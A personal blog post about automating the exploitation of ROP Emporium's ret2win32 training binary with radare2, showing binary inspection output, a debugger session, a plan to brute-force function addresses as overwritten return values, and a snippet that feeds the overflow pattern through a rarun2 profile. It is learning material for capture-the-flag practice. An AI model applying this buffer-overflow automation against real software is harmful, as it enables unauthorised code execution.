Binary Exploitation Automation with Radare2

Before I dive into describing my process I want to write a little disclaimer;

This post is by no means a complete guide to automate any kind of practical exploitation of binaries in the real world. This is simply to describe something I learned a while back but never really got around posting anything about it, and you never know, there might still be people interested in parts of this process.

This is something that has been laying around for quite some time and is by no means some kind of super advanced or creative way of doing this (build stuff in your backyard for fun).

ROP Exploitation

This post will not go into the technical details of ROP (Return Oriented Programming), there are a lot of people and posts about this technique, written by people that can do these explanations way better than I could ever. I will however bless you with some awesome resources regarding the topic:

ret2win32

For whoever that is interested in learning ROP, but doesn’t know where to start: ROP Emporium

ROP Emporium is a website that learns you all about ROP, how to exploit it, and even provides you with some tools that are described in the beginner’s guide on the website. The ret2win32 is one of the first challenges they provide on the website to get your feet wet, this same binary is the one that I used to familiarize myself with the ways to try and exploit it in an automated fashion with radare2.

Gathering information

With the target in sight I started off walking the usual path, gathering some information about the binary so I know what I’m dealing with:

 ~/RaROP ▓▒░ rabin2 -I ret2win32                                                                  
arch     x86
baddr    0x8048000
binsz    6442
bintype  elf
bits     32
canary   false
class    ELF32
compiler GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.4) 5.4.0 20160609
crypto   false
endian   little
havecode true
intrp    /lib/ld-linux.so.2
laddr    0x0
lang     c
linenum  true
lsyms    true
machine  Intel 80386
maxopsz  16
minopsz  1
nx       true
os       linux
pcalign  0
pic      false
relocs   true
relro    partial
rpath    NONE
sanitiz  false
static   false
stripped false
subsys   linux
va       true

As can be seen in the above output, the NX bit is set which means that the stack will not be executable.

We start off with radare2 in debugging mode, set a breakpoint at main, and continue execution. You could of course do some static information gathering first, I’m more of the struggle-as-you-learn kinda person;

 ~/RaROP ▓▒░ r2 -d ret2win32                                                                        
Process with PID 3077 started...
= attach 3077 3077
bin.baddr 0x08048000
Using 0x8048000
asm.bits 32
glibc.fc_offset = 0x00148
 -- Jingle sploits, jingle sploits, ropchain all the way.
[0xf7fa5c70]> db main
[0xf7fa5c70]> dc
hit breakpoint at: 804857b
[0x0804857b]>

Everything still works, let’s analyze the functions;

[0x0804857b]> aaa
[Cannot analyze at 0x08048470g with sym. and entry0 (aa)
[x] Analyze all flags starting with sym. and entry0 (aa)
[Warning: Invalid range. Use different search.in=? or anal.in=dbg.maps.x
Warning: Invalid range. Use different search.in=? or anal.in=dbg.maps.x
[x] Analyze function calls (aac)
[x] Analyze len bytes of instructions for references (aar)
[x] Check for objc references
[x] Check for vtables
[TOFIX: aaft can't run in debugger mode.ions (aaft)
[x] Type matching analysis for all functions (aaft)
[x] Propagate noreturn information
[x] Use -AA or aaaa to perform additional experimental analysis.
[0x0804857b]> afl
0x08048480    1 33           entry0
0x08048440    1 6            sym.imp.__libc_start_main
0x080484c0    4 43           sym.deregister_tm_clones
0x080484f0    4 53           sym.register_tm_clones
0x08048530    3 30           entry.fini0
0x08048550    4 43   -> 40   entry.init0
0x080485f6    1 99           sym.pwnme
0x08048460    1 6            sym.imp.memset
0x08048420    1 6            sym.imp.puts
0x08048400    1 6            sym.imp.printf
0x08048410    1 6            sym.imp.fgets
0x08048659    1 41           sym.ret2win
0x08048430    1 6            sym.imp.system
0x080486f0    1 2            sym.__libc_csu_fini
0x080484b0    1 4            sym.__x86.get_pc_thunk.bx
0x080486f4    1 20           sym._fini
0x08048690    4 93           sym.__libc_csu_init
0x0804857b    1 123          main
0x08048450    1 6            sym.imp.setvbuf
0x080483c0    3 35           sym._init
[0x0804857b]>

Oh my, a function with the name ‘pwnme’? Let’s look at this a little bit closer:

[0x0804857b]> pd @ 0x080485f6

Because I want to keep this post on the short side I will just describe what is in there, and you will have to take my word for it that I’m talking the truth (or don’t and do the ret2win thingy).

This function also holds the print statement and takes the input with fgets at 0x0804864e the fgets function is responsible for reading the user input and storing it in memory, by overwriting certain values we can overwrite EIP with our own value.

Way of the Automation

Normally we would assimilate the right information to construct our payload and return into the function that we want to return in to complete the challenge.

My take on these kind of binaries in particular, where no special input values are needed to validate the call to this function is to write a simple script that is able to leverage the radare2 framework to attempt all the different addresses of the functions as return address, which can be extracted with the afl command.

The thought process I have can be described as follows:

  1. The script takes a buffer which is used to crash the program;
  2. With the pwn library a unique pattern is created that is used to locate the offset of the crash;
  3. The EIP value is extracted when the program crashes and correlated against the pwn pattern to locate the offset
  4. The addresses of the different functions in the program are being retrieved
    • The functions starting with sym.imp. are not used because these are debug symbols referring to addresses related to the system calls (in this specific binary, but also in most other binaries that are loaded in radare2, see radare2 flags);
  5. The brute force starts checking every function address, using this as a return value which is added to the pattern of garbage that is used to generate a crash;
  6. To execute the program with this pattern the radare2 profile option is being used to store the pattern and use this pattern the moment the program asks for user input. This is done with the radare2 debug profile because normally the stdout would be redirected to that process, the profile ensures that this output is piped to the radare2 process of the user;
  7. A search for the string flag is being done on the output after executing the function, if it holds this value it will output the program’s output;

radare2 profile

The above steps are actually quite simple, however it took me a little while to automate the process of accepting the user supplied value given through stdin, to be used as the buffer to be used to overflow the stack.

This is why the radare2 profile is created (somewhat) dynamically by writing the contents to the profile.rr2 which in turn gets read when the debug mode is entered. So for everyone that was reading this wondering how, the following code snippet shows you how:

with open('profile.rr2', 'w+') as profile:
    profile.write('#!/usr/bin/rarun2\nstdin="{0}"\n'.format(pattern))

Conclusion

I created a little Python script which you can find here (only works for x86 for now, also only tested on ret2win32).

As you can see in below image I probably spend more time on the colors and output than the script itself, overall it was a fun weekend project and I got a good grade with it for one of my university’s courses;

all these beautiful colors

Again, not anything new, groundbreaking or advanced, but for the people that read the whole thing; thank you!

Stay safe in these weird times, spend time with friends and family etc. etc.